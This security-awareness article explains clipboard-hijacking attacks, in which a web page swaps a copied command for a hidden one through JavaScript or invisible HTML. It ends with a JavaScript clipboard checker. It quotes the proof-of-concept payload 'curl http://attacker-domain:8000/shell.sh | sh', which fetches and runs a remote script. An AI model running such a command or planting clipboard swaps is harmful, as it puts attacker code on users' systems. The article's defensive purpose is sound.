You can be hacked just by copying and pasting on a web page


It turns out that programmers, system administrators, security researchers, and technical people are at risk of having their systems compromised when they copy and paste commands from a web page into a console or terminal.

How To Get Hacked By Accidentally Copy Pasting
This is why you should NEVER copy paste commands directly into your terminal. Ask any developer or Admin if they have ever copied a command line or code snippet...

Here’s why you shouldn’t copy-paste commands directly into the terminal.

Just ask any developer or administrator if they have ever copied a command line or code snippet from the web.

The answer is probably “yes”. You might assume that what you copy is exactly what gets pasted, but that is not always the case.

Backdoor is automatically inserted into the clipboard

Recently, Gabriel Friedlander, founder of Wizer, a security awareness training platform, warned users to be careful when copying and pasting commands from web pages, and demonstrated an obvious yet surprising hack.

Whether you are a beginner or an expert, it is common to copy frequently used commands from a web page (such as StackOverflow) and paste them into an application, a Windows command prompt, or a Linux terminal.

However, Friedlander warns that web pages may secretly replace the contents of the clipboard, so that what is actually copied to the clipboard is very different from what was intended to be copied.


If the necessary care is not taken, the developer may realize the mistake only after pasting the text, and by that time it will be too late.

In a simple proof of concept (PoC) published on his blog, Friedlander asks readers to copy a simple command that many system administrators and developers will be familiar with.

PoC commands to be copy-pasted

Friedlander’s HTML page has a simple command that can be copied to the clipboard.

sudo apt update

If you copy “sudo apt update” from Friedlander’s blog and paste it into a text box or Notepad, the following string appears instead:

curl http://attacker-domain:8000/shell.sh | sh

Not only does the clipboard show a completely different command, but there is also a newline (or return) character at the end of the command.

In other words, the above example will be executed as soon as you paste it directly into a Linux terminal.

People who pasted this text might have mistaken it for a copy of the familiar command “sudo apt update”, which is used to get updates for software installed on the system.

But that wasn’t really the case.

What causes it?

The cause is JavaScript code hidden in the PoC HTML page set up by Friedlander.

As soon as you copy the text “sudo apt update” contained in an HTML element, the JavaScript “event listener” catches the copy event and replaces the clipboard data with malicious executable code.

Although event listeners have a variety of correct uses in JavaScript, this is an example of a malicious use.

Friedlander said:

This is why you should never copy-paste commands directly into the terminal

You think you’re copying one thing, but it gets replaced by something else, like malicious code. Just by injecting a single line of code into the copied code, it is possible to create a backdoor into the application.

This attack is very simple, but also very effective.

One Reddit user also presents an alternative example of this trick that doesn’t require JavaScript, where invisible text created with HTML and CSS styling is copied to the clipboard when the visible portion of the text is copied.

Hidden HTML (right) is copied during copy-paste and contains unexpected lines (left)

https://jsfiddle.net/rkqg9bf6/ (test site)

The problem is not only that websites can use JavaScript to change the contents of the clipboard. Commands can also simply be hidden in the HTML: invisible to the human eye, but copied by the computer.

This is another reason why you shouldn’t blindly trust anything you copy from a web page, and why you should paste it into a text editor first.

Simple, but an important security lesson to implement.
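The check below is an added example, not code from Friedlander's PoC or the original article. It compares the text a user saw selected with what actually landed on the clipboard and flags the traits described above: replaced content, hidden extra lines, and the trailing newline that makes a terminal execute on paste. The function name and finding labels are hypothetical, and how the two strings are obtained is left to the caller.

```javascript
// Added example: names (auditClipboard, finding labels) are hypothetical.
// Compares the text a user saw selected with what actually landed on the
// clipboard, and flags the traits described in the article.
function auditClipboard(visibleText, clipboardText) {
  const norm = (s) => s.replace(/\r\n?/g, "\n"); // treat CRLF/CR as LF
  const seen = norm(visibleText).trim();
  const got = norm(clipboardText);
  const findings = [];

  // Clipboard differs from the visible selection (JavaScript swap or hidden HTML).
  if (got.trim() !== seen) {
    findings.push(got.includes(seen) ? "extra-content" : "content-replaced");
  }
  // A trailing newline makes a terminal run the line as soon as it is pasted.
  if (/\n[ \t]*$/.test(got)) findings.push("trailing-newline");
  // More lines on the clipboard than were visible on the page.
  if (got.trim().split("\n").length > seen.split("\n").length) {
    findings.push("hidden-lines");
  }
  // Control characters other than tab and newline have no place in a command.
  if (/[\x00-\x08\x0b-\x1f\x7f]/.test(got)) findings.push("control-characters");

  // JSON.stringify shows newlines as \n so they are visible in the report.
  return { safe: findings.length === 0, findings, preview: JSON.stringify(got) };
}

// Samples: a clean copy, the article's PoC strings, and a constructed
// hidden-text case.
const samples = [
  ["sudo apt update", "sudo apt update"],
  ["sudo apt update", "curl http://attacker-domain:8000/shell.sh | sh\n"],
  ["git status", "git status\necho constructed-hidden-line\n"],
];
for (const [seen, got] of samples) {
  const r = auditClipboard(seen, got);
  console.log(r.safe ? "OK  " : "WARN", r.findings.join(",") || "-", r.preview);
}
```

Printing the escaped `preview` rather than the raw text is the point of the "paste into a text editor first" advice: the newline and any extra lines become visible before anything reaches a shell.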
